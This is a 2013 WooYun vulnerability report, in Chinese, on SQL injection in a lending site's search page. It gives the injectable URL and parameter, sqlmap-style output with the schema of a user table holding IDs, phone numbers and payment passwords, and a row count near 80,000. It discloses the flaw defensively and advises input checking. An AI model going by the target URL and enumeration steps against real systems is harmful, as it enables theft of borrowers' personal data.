漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-034808
漏洞标题:数银在线某分站sql注入一枚(8万贷款用户资料)
相关厂商:数银在线
漏洞作者: springold
提交时间:2013-08-20 15:28
修复时间:2013-10-04 15:29
公开时间:2013-10-04 15:29
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-20: 细节已通知厂商并且等待厂商处理中
2013-08-24: 厂商已经确认,细节仅向厂商公开
2013-09-03: 细节向核心白帽子及相关领域专家公开
2013-09-13: 细节向普通白帽子公开
2013-09-23: 细节向实习白帽子公开
2013-10-04: 细节向公众公开
简要描述:
数银在线网站存在SQL注入,可脱裤。
详细说明:
网站搜索功能未对用户输入进行检查,导致SQL注入:
http://s.6677bank.com/shuyin/searchPage.do?tagType=1&tagStr=%27
漏洞证明:
数据库里面东西不少(140个表),拉一个包含用户信息表字段:
Database: sycms_new
Table: iw_user
[33 columns]
+---------------------+---------------+
| Column | Type |
+---------------------+---------------+
| admin_id | int(11) |
| adress | varchar(256) |
| agenter_id | varchar(16) |
| cell | varchar(16) |
| cert_no | varchar(32) |
| cert_type | varchar(20) |
| check_cert | char(1) |
| check_phone | char(1) |
| city | varchar(32) |
| create_dt | timestamp |
| defined_login_type | tinyint(4) |
| email | varchar(32) |
| enabled_status | char(1) |
| firm_name | varchar(128) |
| gender | varchar(4) |
| iw_user_id | varchar(32) |
| last_login_ip | varchar(16) |
| last_login_time | timestamp |
| login_fail_quantity | int(11) |
| login_quantity | int(11) |
| memo | varchar(256) |
| pay_password | varchar(32) |
| phone | varchar(16) |
| photoName | varchar(256) |
| province | varchar(32) |
| real_name | varchar(128) |
| update_dt | timestamp |
| user_actkey | varchar(32) |
| user_name | varchar(32) |
| user_points | decimal(15,0) |
| user_source | varchar(20) |
| user_type | tinyint(4) |
| zipcode | varchar(10) |
+---------------------+---------------+
具体用户信息不列了。
Database: sycms_new
+---------+---------+
| Table | Entries |
+---------+---------+
| iw_user | 79432 |
+---------+---------+
接近8万条用户记录
另外,某个表中还包含了某台服务器ftp明文账号密码。
没进一步挖了。
修复方案:
对相关参数进行检查。
版权声明:转载请注明来源 springold@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2013-08-24 22:42
厂商回复:
最新状态:
暂无